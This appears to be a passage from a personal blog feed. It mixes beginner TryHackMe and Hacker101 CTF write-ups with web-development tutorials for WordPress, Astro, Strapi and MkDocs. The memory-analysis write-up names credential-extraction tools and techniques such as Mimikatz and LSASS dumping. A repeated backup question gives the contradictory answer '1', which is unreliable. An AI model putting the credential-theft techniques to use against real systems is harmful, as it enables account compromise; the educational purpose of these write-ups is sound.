Public WiFi gives an attacker ideal opportunities to intercept and record traffic to steal sensitive information; this is referred to as a "man-in-the-middle" attack.

The ideal solution is simply not connecting to untrusted networks. When that is not feasible, Virtual Private Networks (VPNs) encrypt all traffic, rendering any interception techniques useless.

All websites should use an encrypted HTTPS connection, represented by a padlock. The presence of the padlock indicates that the connection is secure; it does not guarantee that the website itself is safe. If you are accessing a website without the padlock symbol, never enter any credentials or sensitive information.

Deploy the interactive content by clicking the green button at the top of the task.

No Answer Needed

The interactive content for this task demonstrates what can happen if information is sent over a potentially unsafe network with various types of encryption (or lack thereof). There is no flag for this task, but you are encouraged to try each of the different scenarios, mixing and matching the options provided in the control box at the bottom right of the screen.

No Answer Needed

Task 8: Backups

Backups are arguably the single most important defensive measure you can take to protect your data.

The golden standard for taking backups is the "3,2,1 rule", which specifies that you should always keep at least three up-to-date copies of your data, stored on at least two different storage mediums, with one backup stored "off-site".

Of equal importance is the frequency at which you take backups, which usually depends on the sensitivity of the data.

What is the minimum number of up-to-date backups you should make?

3

What is the minimum number of up-to-date backups you should make?

1

Task 9: Updates and Patches

When vulnerabilities are discovered in software, developers release special updates called patches. It is imperative that you update software whenever possible.

Despite a patch having been made available, the Wannacry ransomware was still able to attack millions of unpatched systems. When software becomes EOL (End Of Life), it must be replaced as soon as possible.

Antivirus software works using a local database of known exploit signatures, which must be kept up-to-date. If antivirus software is not allowed to update, the local signature database will quickly become outdated, resulting in malicious software potentially falling through the gaps.

(Optional) Complete the Blue room on TryHackMe to see the brutal effects of the Eternal Blue exploit in action against an unpatched machine for yourself!

No Answer Needed

Task 10: Conclusion

I have completed the Common Attacks room!

No answer needed

Alhamdulilah, hope it useful

Security Awareness | TryHackMe Write-Up

Sat, 13 Sep 2025 00:00:00 GMT

Here i want to share about my write-up for the room Security Awareness, an introduction to security awareness; why its important, the impact of being attacked, different threat actors and basic account security. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction to Security Awareness

Read why security awareness is so important for everyone.

No Answer Needed

Task 2: Why Security Awareness is essential

Security awareness training is a must-have skill to counter efforts by attackers and reduce risks within the business. A few of the benefits are below:

Help prevent data breaches
Minimize and reduce risks and threats
Improve IT defenses
Improves customer confidence

No Answer Needed

Task 3: Data and account security

How many people were affected by eBay being hacked?

145 million

What data was leaked from Playstation being hacked?

names, addresses, e-mail, birth dates

Task 4: Check if you've ever been part of a cyber breach

Go to haveibeenpwned.com and see if your information has ever been part of a breach. If you have, don't panic - ensure you change the breached accounts password. The next room in this module will talk about how you can use a password manager to create unique passwords for all your accounts.

No Answer Needed

Task 5: Cyber threat actors

The motivation of threat actors may vary and can be categorized into different groups:

Nation-state cyber threat actors are geopolitically motivated.
Cybercriminals are financially motivated.
Hacktivists are ideologically motivated.
Terrorist groups are motivated by ideological violence.
Thrill-seekers are motivated by satisfaction.
Insider threat actors are motivated by discontent.

Who would most likely be interested in exploiting a business?

Cybercriminals

Who would most likely be interested in exploiting a personal computer for fun?

Thrill-seekers.

Who would most likely be interested in exploiting a website to deliver a message?

Hacktivists

Task 6: Conclusion

This room introduced you to the basics of security awareness concepts and knowledge that can help you stay safe online.

Complete this task and join the common attacks room.

Hacker101 CTF | A Little Something to Get You Started

Thu, 11 Sep 2025 00:00:00 GMT

CTF Begin

First, you can start the CTF and then you will wait to be redirected to a new URL.

Then you can see in the image below that the CTF has started.

We can check the developer tools (Ctrl + Shift + I) and then we find an image, even though we do not find any images on the page.

We can try to open the URL path and then, yes, we find the flag.

Why Is This a Vulnerability?

This type of flaw is categorized as Information Disclosure or Improper Asset Management. It's considered a vulnerability because the application exposes sensitive information or resources that should not be publicly accessible.

Even though it's "hidden" from the main view, any user can easily discover it using standard browser tools.

Use Case in the Real World:

In a real-world scenario, instead of a CTF flag, an attacker might find:

API Keys: Secret keys for services like AWS, Google Maps, or Stripe, leading to unauthorized access and financial loss.
Internal URLs: Paths to admin panels, internal dashboards, or backup files (.bak, .config) that were never meant to be public.
Developer Comments: Snippets of code, old passwords, or business logic left in HTML/CSS/JS comments.

An attacker can use this leaked information as a foothold to launch more severe attacks on the system.

Alhamdulillah. Hope it useful.

Add an Advanced Preloader to WordPress

Mon, 25 Aug 2025 00:00:00 GMT

DISCLAIMER

This tutorial is intended for intermediate to advanced users who are familiar with the WordPress file structure and the use of cPanel/FTP. The steps described below involve modifying core files and directory structures. Any mistake in following this guide can result in an inaccessible website or data loss.

You are proceeding at your own risk. The author strongly recommends that you perform a full backup (both files and database) before attempting any method in this article. The author is not liable for any damage or data loss that may occur.

How to Add an Advanced Preloader with a Percentage Counter to WordPress

Improve your website's user experience by implementing a dynamic preloader that displays a clean CSS rotation animation, your site logo, and a percentage counter that moves from 0% to 100%.

The counter will quickly move to 99%, waiting for the page to load, before reaching 100% and gracefully disappearing.

Here's how to add it to your WordPress theme manually.

Step 1: Add the HTML Structure

First, we need to place the HTML for the preloader right after the opening <body> tag so it's the first thing to render.

Location: Edit your theme's header.php file and place the following code directly after the <?php wp_body_open(); ?> function.

<div class="preloader">
    <div class="preloader-content">
        <div class="loading-spinner"></div>
        <img class="preloader-logo" src="YOUR_LOGO_URL" alt="Logo">
        <div class="percentage-counter">0%</div>
    </div>
</div>

Important: Replace YOUR_LOGO_URL with the actual URL of your logo image, which you can upload via the WordPress Media Library.

Step 2: Style the Preloader with CSS

Next, we'll add the CSS to make the preloader a full-screen overlay, center the content, and create the spinning animation.

Location: In your WordPress dashboard, navigate to Appearance > Customize > Additional CSS and add the following code.

/* ===== Preloader Styling Start ===== */
.preloader {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    z-index: 9999;
    background-color: #ffffff; /* Change background color here */
    display: flex;
    justify-content: center;
    align-items: center;
}

.preloader-content {
    text-align: center;
}

/* Spinner Animation */
.loading-spinner {
    border: 4px solid rgba(0, 0, 0, 0.1); /* Base ring color */
    border-left-color: #333; /* Spinning part color */
    border-radius: 50%;
    width: 50px;
    height: 50px;
    animation: spin 1s linear infinite;
    margin: 0 auto 20px auto; /* Space between spinner and logo */
}

@keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
}

/* Preloader Logo */
.preloader-logo {
    max-width: 150px; /* Adjust max logo size */
    height: auto;
    display: block;
    margin-bottom: 20px; /* Space between logo and percentage */
}

/* Percentage Counter Text */
.percentage-counter {
    font-size: 24px;
    font-weight: bold;
    color: #333; /* Percentage text color */
    font-family: sans-serif;
}
/* ===== Preloader Styling End ===== */

Step 3: Implement the JavaScript Logic

This is the core logic that runs the percentage counter and hides the preloader once the site is fully loaded. WordPress includes jQuery by default, so we can use it directly.

Location: Edit your theme's footer.php file and place the following script just before the closing </body> tag (and after the <?php wp_footer(); ?> function).

<script>
jQuery(document).ready(function($) {
    let counter = 0;
    const counterElement = $('.percentage-counter');

    // Start an interval to increment the counter (simulates progress)
    const interval = setInterval(() => {
        if (counter >= 99) {
            clearInterval(interval); // Stop at 99%
            return;
        }
        counter++;
        counterElement.text(counter + '%');
    }, 30); // The interval speed in ms. Smaller is faster.

    // The 'load' event fires when the entire page is fully loaded
    $(window).on('load', function() {
        // Clear the interval just in case it's still running
        clearInterval(interval);
        
        // Force the counter to 100%
        counterElement.text('100%');
        
        // Add a short delay for the user to see 100%, then fade out
        $('.preloader').delay(300).fadeOut(500);
    });
});
</script>

Once you have added these three code blocks, your WordPress site will now feature a professional and dynamic preloader that improves the perceived performance and overall user experience.

The repo link is also posted here: https://github.com/farrosfr/jquery-preloader-with-counter

Alhamdulillah. Hope it usefull.

Add Google Analytics to Astro: The Complete Guide

Mon, 18 Aug 2025 00:00:00 GMT

Hello everyone, in this article, we'll cover how to integrate Google Analytics into your Astro project.

Here, we'll discuss how to leverage Astro's features: centralized layouts, environment variables, and handling View Transitions. Let's get started!

Prerequisites

Before proceeding, ensure you have the following:

An existing Astro project.
A Google Analytics (GA4) account.
Your Measurement ID (typically in the G-XXXXXXXXXX format).

Step 1: Configure Environment Variables for Security

Hardcoding sensitive keys or IDs directly into your source code is poor practice. Instead, we'll use environment variables.

Create a new file in your project's root directory (at the same level as package.json) and name it .env.
Add your Measurement ID to this file in the following format:
```
# .env
PUBLIC_GA_ID=G-XXXXXXXXXX
```
Replace G-XXXXXXXXXX with your actual ID. The PUBLIC_ prefix is a specific Astro instruction that makes the variable accessible on the client-side (in the browser).
Remember to add .env to your .gitignore file to prevent it from being committed to your Git repository.

Step 2: Add Global Types for TypeScript

If your project uses TypeScript (as most Astro projects do), you need to inform the TypeScript compiler about the global variables (gtag and dataLayer) that the Google script will create. This prevents errors during development.

Open your src/env.d.ts or src/types.d.ts file and add the following global declaration:

// src/env.d.ts or src/types.d.ts

declare global {
  interface Window {
    dataLayer: any[];
    gtag: (...args: any[]) => void;
  }
}

Step 3: Implement in the Base Layout (`BaseLayout.astro`)

A core principle of Astro is DRY (Don't Repeat Yourself). Therefore, we will add the Google Analytics script only once in a base layout file that is used by all pages. Typically, this file is src/layouts/BaseLayout.astro.

Open your BaseLayout.astro file and add the following code block inside the <head> tag:

---
// BaseLayout.astro frontmatter
---
<html lang="en">
  <head>
    {/* ...other head tags... */}

    {/* ===== Google Analytics Script Block ===== */}
    {
      import.meta.env.PROD && (
        <>
          <script
            async
            src={`https://www.googletagmanager.com/gtag/js?id=${import.meta.env.PUBLIC_GA_ID}`}
          />
          <script
            is:inline
            define:vars={{
              gaId: import.meta.env.PUBLIC_GA_ID,
            }}
          >
            window.dataLayer = window.dataLayer || [];
            function gtag() {
              dataLayer.push(arguments);
            }
            gtag("js", new Date());
            gtag("config", gaId);
          </script>
        </>
      )
    }
    {/* ======================================= */}
  </head>
  <body>
    {/* ...body content... */}
  </body>
</html>

Code Explanation:

import.meta.env.PROD && (...): Ensures the script only runs when the project is built for production, not during local development.
import.meta.env.PUBLIC_GA_ID: Retrieves the ID from the .env file we created earlier.
is:inline: An essential Astro attribute that prevents Astro from processing the script, injecting it directly into the final HTML.

Step 4: Handle Modern Navigation (View Transitions)

Many modern Astro sites use View Transitions for smoother navigation without full page reloads. This can prevent Google Analytics from tracking page changes. The solution is to listen for Astro's navigation events.

Add the following script inside the <body> tag of your BaseLayout.astro file (placing it just before the closing </body> tag is good practice):

{/* ...inside the <body>... */}

<script is:inline>
  document.addEventListener('astro:after-swap', () => {
    if (typeof gtag === 'function' && typeof import.meta.env.PUBLIC_GA_ID !== 'undefined') {
      gtag('event', 'page_view', {
        page_path: location.pathname,
        page_location: location.href,
      });
    }
  });
</script>

This script manually sends a page_view event to Google Analytics every time an Astro page transition completes.

Step 5: Configure Your Hosting Platform (Netlify Example)

Since .env is not committed, how does the live server know your Analytics ID? You need to add it to your hosting platform's settings. Here’s how to do it on Netlify:

Log in to your Netlify dashboard.
Select your site, then navigate to Site configuration > Build & deploy > Environment variables.
Click "Add a variable".
Fill in the Key as PUBLIC_GA_ID and the Value with G-XXXXXXXXXX.
Save and trigger a new deploy to apply the changes.

Verification

After deploying your site, don't panic if the standard reports in Google Analytics are empty. It can take up to 48 hours for data to appear.

Use the Realtime report for instant verification:

Open Google Analytics > Reports > Realtime.
Open your live site in another browser tab and navigate through a few pages.
You should see your activity appear in the Realtime report within seconds. If so, congratulations, your installation is successful!

Conclusion

By following these steps, you have successfully integrated Google Analytics into your Astro project in a clean, secure, and maintainable way. This method not only ensures accurate data tracking but also keeps your codebase professional and tidy.

Alhamdulilah. Hope it useful!

Image Source

developer.google.com

When Astro's SSG Hits a Scalability Wall

Sun, 17 Aug 2025 00:00:00 GMT

The Early Days: The Charm of Static Site Generation

When I first built this site, Astro felt like the answer. As a developer, the concept of Static Site Generation (SSG) was a luxury. Amazing build speeds, fast site performance due to generating static HTML without JavaScript (by default), and a smooth developer experience (DX).

Managing content via Markdown files within src/content/ was straightforward. Each article was a neat, structured .md file, all under Git version control. For a portfolio or personal blog with a few articles, this workflow was great:

Write a new article in the code editor.
git add .
git commit -m "feat: add new blog post"
git push
Wait a few minutes for Netlify to finish building.
The new article goes live.

Simple, efficient, and very satisfying.

The Scalability Wall

As time went on, this site began to grow. The number of articles increased from a handful to dozens. This is where I started to feel some "pebbles" in my workflow.

The main problem was the build-deploy cycle.

Every change, no matter how small—fixing a typo, changing an image, or publishing a new article—required rebuilding the entire site.

Waiting for the build process to complete felt like a pause, which also consumed Netlify's hosting quota. This led to considerations because the build process was no longer as fast as before, given the increasing number of articles already created.

The "Aha!" Moment: Decoupling Content from Code

The core issue was content and code being too tightly coupled. My articles were part of the codebase. To update content, I had to redeploy the code.

This is where the concept of a Headless CMS entered the picture.

With a Headless CMS (like Strapi, Contentful, or Sanity), content (articles, project data, etc.) lives on its own platform. My Astro site no longer needed to know about Markdown files. Instead, it only needed to know how to "ask" the CMS via an API to get the required content.

A Solution: Astro SSR (Server-Side Rendering)

Astro, with its flexibility, already had an answer for this. Besides the 'static' mode, Astro also supports 'server' mode.

By switching the output in astro.config.ts to 'server' and using an adapter like @astrojs/netlify, my site's architecture fundamentally changed:

No more per-content builds: The site is no longer generated into thousands of HTML files during the build. Instead, Netlify deploys a serverless function.
Render on Demand: When a user visits /blog/new-article, this function runs. It will contact the Headless CMS, fetch the data for new-article, render it into HTML on the fly, and send it to the user.

The publishing workflow can also be changed to:

Write and edit articles in the Headless CMS web interface.
Press the "Publish" button.
Done. The article goes live instantly. No git push, no waiting for builds.

Conclusion: Astro Remains Great, with the Right Configuration

Astro is an incredibly flexible framework. As an SSG, it is indeed excellent for small to medium-scale projects.

However, when your site grows and the need for more dynamic content management arises, Astro doesn't force you to switch. It provides a path through SSR mode.

By the way, I'm still on SSG and haven't tried hybrid yet, but the considerations above compel me to explore it eventually.

Alhamdulillah. Hope it usefull.

Strapi VPS Installation with aaPanel

Tue, 12 Aug 2025 00:00:00 GMT

Bismillah

This article shares an my experience in installing Strapi on a server. Strapi is a popular open-source headless CMS, offering a lot of freedom to build APIs.

The technology foundation used for this setup is a VPS with aaPanel.

Phase 1: Preparation

Preparing the Database: Creating a new MySQL database via the "Databases" menu in aaPanel, complete with a user and password.
Preparing the Node.js Environment: Through the "App Store" in aaPanel, the "Node.js version manager" can be installed to select the latest LTS version.
Strapi Installation: Using the standard terminal command:
```
npx create-strapi-app@latest api.domain-name
```
An installation wizard appears and gives the following options:
- Installation type: Custom (manual settings), to use the previously created MySQL database.
- Database Client: MySQL
- Example Data: No, due to a specific preference for product data.
- TypeScript: Yes, for maintainability and type safety.
- Git Initialization: Yes, to have version control from the very beginning.

Up to this point, there were no issues.

Phase 2: Git

For developer portfolio purposes, contributions should be credited to the personal account (My username is farrosfr) even if the repository is in an organization. The solution is:

Git Author Configuration: Before the first commit, set the Git identity on the VPS with the command:

git config --global user.name "farrosfr"
# Using the noreply email from GitHub for privacy
git config --global user.email "ID+farrosfr@users.noreply.github.com"

Authentication with Personal Access Token (PAT): GitHub no longer accepts regular passwords for Git operations via HTTPS, so using a PAT is necessary.

After this, the first push to the organization's repository was successful, with the commit correctly displaying the personal account.

Phase 3: Apache Configuration (Encountering 404 & 403 Errors)

After registering the Node.js project in aaPanel, I try to access api.domain-name/admin resulted in a "404 Not Found" error from the Apache Server.

Incorrect Diagnosis: Initially, my thought was to shut down Apache, as the aaPanel project should use Nginx. This was a wrong and dangerous assumption.

Correct Diagnosis: After checking the "Website" menu in aaPanel, it became clear that the VPS is an environment with many PHP-based websites, all running on Apache. Shutting down Apache would disable all those websites. The issue was a port conflict with Apache.

Solution: Reverse Proxy

Deleting the project configuration from the "Node Project" menu to avoid overlaps.
Adding a new website in the PHP Project section with a static configuration.
Accessing the "Reverse Proxy" config.
A new reverse proxy rule was added there, targeting the internal Strapi application URL: http://127.0.0.1:1337.

The result was a success. The Strapi admin registration page finally appeared, allowing for account creation there.

Phase 4: DNS, SSL, and PM2

Setting up DNS: Logging into the domain registrar to create the A record needed for SSL verification.
Installing SSL: Using Let's Encrypt to enable SSL.
Running Permanently: Re-registering the Strapi project in the "Node Project" menu. This ensures the application is managed by PM2.

Alhamdulillah. Hopefully, this is useful.

Build a Pro Docs Site Fast with MkDocs

Mon, 11 Aug 2025 00:00:00 GMT

Image source: snapcraft.io

Introduction

Have you ever found it difficult to manage project documentation? Writing everything in a single Word document is inefficient, as is creating a website from scratch using HTML and CSS. If so, let's get acquainted with MkDocs.

In this article, we will discuss how to create a clean, modern, and functional documentation website in a matter of minutes.

What is MkDocs?

MkDocs is a Static Site Generator (SSG). With it, we can transform Markdown (.md) files and a configuration file into a complete HTML website, ready for hosting.

Why MkDocs?

Focus on Content: Concentrate on writing content in Markdown, without worrying about complex HTML.
Automatic Navigation: It creates a navigation menu based on your file and folder structure.
Fast & Lightweight: The resulting website is static, which makes it very fast.
Customizable: Many themes and plugins are available. One of the most popular is Material for MkDocs, which includes features like search, dark mode, and a modern design.

How to Create the Website

Installing MkDocs

Open your terminal and run the following command.

pip install mkdocs mkdocs-material

Creating a New Project

Run this command in your projects folder.

mkdocs new web-documentation
cd web-documentation

This command will create a web-documentation folder with the following structure:

.
├── docs/
│   └── index.md
└── mkdocs.yml

docs/: The folder where all your Markdown content files will be stored.
mkdocs.yml: The main configuration file for your website.

Project Configuration (`mkdocs.yml`)

Open the mkdocs.yml file and adjust its content.

For example:

# Basic website information
site_name: My Project Documentation
site_author: FarrosFR

# Use the Material theme
theme:
  name: material
  
# Navigation Menu Structure
nav:
  - 'Home': 'index.md'
  - 'About': 'about.md'

The configuration above indicates that our website will have two pages in the navigation menu: "Home" and "About".

Adding Content

Now, let's add the content.

Edit docs/index.md (Home):

# Welcome to My Project Documentation

This is the main page for the project documentation. This project aims to...

Create the file docs/about.md (About):

# About the Project

This project was created using MkDocs to simplify documentation management.

## Main Features
- Feature A
- Feature B
- Feature C

Running the Local Server

To see your website live, run the following command.

mkdocs serve

Next, open your browser and navigate to http://127.0.0.1:8000. Whenever you save a change in a .md file, the browser will update automatically.

Building the Website for Production

Once you are satisfied with the result, stop the local server (Ctrl + C) and run the build command.

mkdocs build

This command will create a new folder named site. The contents of this folder are the final version of your website.

Deploying to Hosting

You only need to upload the entire contents of the site folder, as it contains static files.

Alhamdulillah. Thank you for reading, and I hope you find this useful.

Need Web Development Services?

If you need professional assistance in building your website, feel free to contact me. https://linkedin.com/in/farrosfr/

Building a Website with Jamstack

Sat, 09 Aug 2025 00:00:00 GMT

Bismillah

Here I want to share about a web architecture. The background is that I am currently focusing on learning cyber security, especially within the offensive scope. So, while learning, I create write-ups of my studies to be published on Medium.

1. What Exactly is Jamstack?

Here is an analogy that can be used:

Traditional Website (Example: Wordpress): Every time a guest arrives, we have to make food from scratch. Starting from cooking, until it becomes a meal. This process is done while the guest is at the front door. So, this process is quite energy-consuming.
Jamstack Website: We build the food once during the build process. Then this finished food (static file) is duplicated and placed in many locations around the world (CDN). So if a guest comes, they can just take the closest food in the region they are accessing from.

So technically, JAM is an acronym for:

JavaScript
APIs
Markup

2. Why Does the farros.co Website Use Jamstack?

Here are some points that are used.

Security: The website is just a collection of static files. So it's difficult to hack from the database and plugin side.
Speed: Pages are already served in CDN form, so they can be fast.
Hosting Costs: Static files can be hosted on a CDN at a low cost, even free for personal projects. You can use tools like Netlify and Cloudflare Pages.
Scalability: The CDN is designed to handle a lot of traffic. So if an article goes viral, it can still be handled.
Dev Experience: We can choose various available favorite technologies or frameworks, such as React, Vue, Svelte, as well as a modern git workflow.

3. Steps to Build a Website with Jamstack

Step 1: Choosing Tools

We don't need all of them, just choose one from each category.

Static Site Generator (SSG)
- Next.JS
- Astro
- Hugo
- Eleventy (11ty)
Headless CMS (Optional for Blog)
- Git-based: just write in markdown format.
- API-based: you can try Strapi, Contentful, or Sanity.io.
Platform Hosting/Deployment:
- Vercel: I haven't used it because they say there's a controversy.
- Netlify: I use this.
- Cloudflare Pages: they say it's very fast because it's integrated with the Cloudflare CDN.

Step 2: Local Development Process

Initialize Project: choose one SSG (e.g., Astro).

# Create a new Astro project
npm create astro@latest

Develop the Look: Start creating pages (.astro or .md), components, and styling. Or you can also use available templates and then modify them.
Run locally:
```
npm run dev
```
Open localhost:4321 in your browser to see your website live as you make changes.

Step 3: Workflow with Git

Create a new repository on github.
Connect your local project folder with the github repository.
Every time you finish a feature or add a change, commit and push to github.
```
git add .
git commit -m "feat: add portfolio page"
git push origin main
```

Step 4: Automatic Deployment

Choose one of the hosting platforms mentioned earlier (Vercel, Netlify, or Cloudflare Pages).
Import the project from the github you just created.
The hosting platform will detect the project as an Astro project, then click deploy.
Done, then we can change the public URL to our own domain, for example farros.co.

So, every time we git push to Github, Netlify or another server platform will automatically rebuild and deploy the latest version of our website. This is called CI/CD (Continuous Integration/Continuous Deployment).

Alhamdulillah. Thank you, I hope this is useful.

Source

https://jamstack.org/img/og/default-og-image.png

Build a Gradebook App with JavaScript

Sun, 03 Aug 2025 00:00:00 GMT

Photo by Growtika on Unsplash

GitHub Repository: farrosfr/js-gradebook-app
Live Demo: Try the Gradebook App Here

I want to share an article about creating a simple "Gradebook App." This project is inspired by the "Review JavaScript Fundamentals" section of the freeCodeCamp curriculum.

The goal is to create a user input for a numerical score. The app will then calculate the letter grade, compare it to the class average, and show a pass/fail message.

1. The HTML Structure

The foundation is a straightforward HTML file (index.html). It contains two main parts:

A <form> with an id="gradeForm" that holds a number <input> for the student's score and a submit <button>.
A <div> with an id="result" that acts as a container to display the final output.

<form id="gradeForm">
    <label for="studentScore">Masukkan Nilai Kamu (0-100):</label>
    <input type="number" id="studentScore" ... >
    <button type="submit">Cek Hasil</button>
</form>

<div class="result-container">
    <p id="result">Hasil akan ditampilkan di sini...</p>
</div>

2. The JavaScript Logic (`script.js`)

This is the main section because there are some functions in this logic.

Core Functions: First, we define pure functions to handle calculations. The getAverage function efficiently sums up scores using the .reduce() array method, a modern and concise approach.

// farrosfr/js-gradebook-app/js-gradebook-app-b8c25e2db8cd8a16c4704baaba74a44b3581cd41/script.js
function getAverage(scores) {
  const sum = scores.reduce((total, score) => total + score, 0);
  return sum / scores.length;
}

Next, getGrade uses a simple if-else if-else chain to convert a numerical score into a letter grade, covering all possible outcomes from "A++" to "F". The hasPassingGrade function cleverly reuses this logic to return a simple boolean value (true or false).

DOM Interaction: To connect our logic to the webpage, we use an event listener. It waits for the DOMContentLoaded event to ensure the HTML is fully loaded before trying to access any elements.

We then attach a submit event listener to our form. Inside this listener:

e.preventDefault() is called to stop the page from refreshing on submission.
The user's input is parsed into a number.
A basic validation checks if the number is between 0 and 100.
The studentMsg function is called, which uses template literals to construct a clean, dynamic message by combining the results from getAverage and getGrade.
Finally, the message is displayed in the result div by setting its textContent.

3. The Styling (`style.css`)

To complete the experience, a simple stylesheet provides a modern, dark-themed UI. It uses CSS variables for a maintainable color scheme and flexbox to center the main container, ensuring a responsive look.

Alhamdulillah, thank you for reading. Hope it's useful.

A Quick Guide to a Multi-Language Astro Site

Fri, 01 Aug 2025 00:00:00 GMT

Objective: To configure the Astro project to serve content in multiple languages (English and Indonesian), ensuring that each page is rendered with the correct HTML lang attribute (en or id). This is the foundational step for multi-language SEO and accessibility.

This guide covers the initial setup without implementing translationKey or hreflang tags, which are part of an advanced SEO strategy for linking translations.

1. Content Organization

The project uses a directory-based approach to separate content by language.

English (Default): English articles reside directly within the src/content/blog/ directory.
- Example path: src/content/blog/my-english-post/index.md
- Resulting URL: https://your-site.com/blog/my-english-post
Indonesian: All Indonesian articles must be placed inside a dedicated id subdirectory.
- Example path: src/content/blog/id/postingan-indonesia-saya/index.md
- Resulting URL: https://your-site.com/blog/id/postingan-indonesia-saya

2. Content Schema Configuration

To track the language of each article, a language field must be added to the blog collection schema.

File: src/content.config.ts

// src/content.config.ts
import { defineCollection, z } from 'astro:content';

const blogCollection = defineCollection({
  type: 'content',
  schema: ({ image }) =>
    z.object({
      // ... other fields like title, description, etc.
      
      // Add this line
      language: z.string().optional(), // Defines the language of the post

      // ... other fields
    }),
});

export const collections = {
  blog: blogCollection,
  // ... other collections
};

language: z.string().optional(): This defines a new, optional language field for all blog posts. It's marked as optional so that older English posts without this field won't cause build errors.

3. Propagating the `language` Attribute Through Layouts

The core of this setup is passing the language value from the Markdown frontmatter up through the chain of nested Astro layouts until it reaches the final <html> tag.

Step 3a: Page Level (`[...id].astro`)

This page reads the frontmatter and starts passing the language prop.

File: src/pages/blog/[...id].astro

// src/pages/blog/[...id].astro
---
// ... imports
export async function getStaticPaths() { /* ... */ }

const { post, posts } = Astro.props;
const { Content, headings, remarkPluginFrontmatter } = await render(post);

// Extract language from the post's frontmatter
const { language } = post.data;
---
{/* Pass the extracted language as a prop to PostLayout */}
<PostLayout {post} {posts} {headings} {remarkPluginFrontmatter} language={language}>
  <Content />
</PostLayout>

Step 3b: Post Layout (`BlogPost.astro`)

This layout acts as a middleman, receiving the language prop and passing it to the main PageLayout.

File: src/layouts/BlogPost.astro

// src/layouts/BlogPost.astro
---
// ... imports

interface Props {
  // ... other props
  language?: string; // Define the prop to be received
}

const {
  // ... other props
  language, // Receive the language prop
} = Astro.props;

// ... other logic
---
{/* Pass the language prop up to PageLayout */}
<PageLayout
  meta={{ /* ... */ }}
  highlightColor={primaryColor}
  back='/blog'
  language={language} 
>
  {/* ... rest of the layout */}
</PageLayout>

Step 3c: Content Layout (`ContentLayout.astro`)

This is likely another middleman layout. It must also be modified to accept and pass on the language prop.

File: src/layouts/ContentLayout.astro

// src/layouts/ContentLayout.astro
---
// ... imports
import BaseLayout from '@/layouts/BaseLayout.astro';

interface Props {
  // ... other props
  language?: string; // Define the prop
}

const { meta, highlightColor, back, language } = Astro.props; // Receive the prop
---
{/* Pass the language prop to the final BaseLayout */}
<BaseLayout meta={meta} highlightColor={highlightColor} language={language}>
  <slot />
</BaseLayout>

Step 3d: Base Layout (`BaseLayout.astro`)

This is the final and most important step. This layout receives the language prop and uses it to dynamically set the lang attribute on the <html> tag.

File: src/layouts/BaseLayout.astro

// src/layouts/BaseLayout.astro
---
// ... imports
import config from '@/site-config';

interface Props {
  // ... other props
  language?: string; // Define the final prop
}

const {
  // ... other props
  // Receive the language prop, with a fallback to the site's default language
  language = config.locale.lang,
} = Astro.props;
---
{/* Use the dynamic language variable here */}
<html lang={language}>
  <head>
    {/* ... */}
  </head>
  <body>
    {/* ... */}
  </body>
</html>

4. Creating Content

With the setup complete, you can now create content with the correct frontmatter.

English Post Example:

---
title: "A Guide to SQLi"
description: "A practical guide."
language: "en"
---
English content goes here...

Indonesian Post Example:

---
title: "Panduan SQLi"
description: "Panduan praktis."
language: "id"
---
Konten Bahasa Indonesia di sini...

Conclusion

By following these steps, the project is now correctly configured to handle multiple languages. Each page will have the appropriate lang attribute, improving both SEO and accessibility. The next logical step for advanced SEO would be to implement a translationKey and hreflang tags to link translated pages together.

Memory Analysis Introduction | TryHackMe Write-Up

Fri, 30 May 2025 07:20:37 GMT

Here is my article on the walkthrough of a free room: Memory Analysis Introduction. Learn how memory analysis helps detect threats during live investigations. I wrote this in 2025 and hope it is useful for learning about memory analysis.

Task 1: Introduction

This session explores how memory analysis supports cyber security investigations, focusing on volatile memory and its role in identifying threats, user activity, and attack traces. It covers memory dumps, attack fingerprints, and their use in real-world cases, with interactive sections to visualize memory structures.

Objectives:

Understand memory analysis in cyber security.
Identify memory structure and behavior.
Recognize attack traces in memory.

Prerequisites:

No answer needed

Task 2: Volatile Memory

Volatile memory, primarily RAM. Once the system is turned off, this data is lost, making it a priority to capture RAM early during investigations.

Memory Hierarchy:

CPU Registers & Cache: Fast but limited in size.
RAM: Main memory for active programs and the operating system.
Disk Storage: Slow, used for long-term storage.
Virtual Memory: Maps virtual addresses to RAM or swap space on the disk when physical memory is full.

RAM is structured into kernel space (for OS and low-level services) and user space (for user processes), with specific regions for:

Stack: Stores temporary data like function arguments.
Heap: For dynamic memory allocation during runtime.
Executable (.text): Stores the CPU instructions.
Data sections: Stores global variables.

Memory analysis offers insights into live system activity, including:

Running processes
Open network connections
Logged-in users and recent commands
Injected code or fileless malware

Since this data disappears after shutdown, memory forensics helps collect vital information during live system investigations.

Q1: What type of memory is prioritized because its data disappears after shutdown?

RAM

Q2: What is the slowest component in the memory hierarchy?

disk

Q3: Which memory region typically contains dynamically allocated data like encryption keys?

heap

Q4: What disk-based area temporarily stores RAM data when memory is full?

swap

Task 3: Memory Dumps

A memory dump is a snapshot of a system’s RAM at a specific moment, capturing data like running processes, network activity, and potentially sensitive information. It plays a key role in forensic analysis, malware investigations, and threat hunting. Security teams analyze memory dumps to detect unauthorized activities, while tools like Mimikatz are used to extract credentials, making memory dumps critical for defense.

Memory dumps can be created using various tools depending on the OS:

Windows: WinPmem, Sysinternals RAMMap, or built-in crash dumps.
Linux/macOS: LiME, dd, or accessing /dev/mem.

There are different types of memory dumps:

Full Memory Dump: Captures all RAM, including user and kernel space.
Process Dump: Captures memory of a single process.
Pagefile/Swap Analysis: Analyzes memory swapped to disk.

Challenges in acquiring a clean memory dump include anti-forensic techniques like hidden modules, kernel manipulation, code injection, and encrypted payloads. These require advanced methods such as memory carving and kernel-level inspection to uncover hidden activities.

Q1: What tool is commonly used by attackers to extract credentials from memory?

Mimikatz

Q2: What type of memory dump captures all RAM, including user and kernel space?

full

Q3: What Linux tool can be used to extract memory for forensic purposes?

lime

Q4: Which file on Windows systems stores memory during hibernation?

hiberfil.sys

Q5: What anti-forensics technique hides processes by altering kernel structures?

DKOM

Task 4: Memory Analysis Attack Fingerprints

Memory analysis is critical for identifying active, fileless attacks that evade disk-based forensics. Key indicators include:

Common Artifacts

Suspicious processes/DLLs (no disk file).
Process hollowing, API hooking, kernel rootkits.
Anomalies like mismatched PE headers or code in writable memory.

Credential Access (T1003)

In-memory extraction of credentials (e.g., LSASS dumping) and C2 communications via HTTP/DNS (decrypted configs/beacons visible in memory).

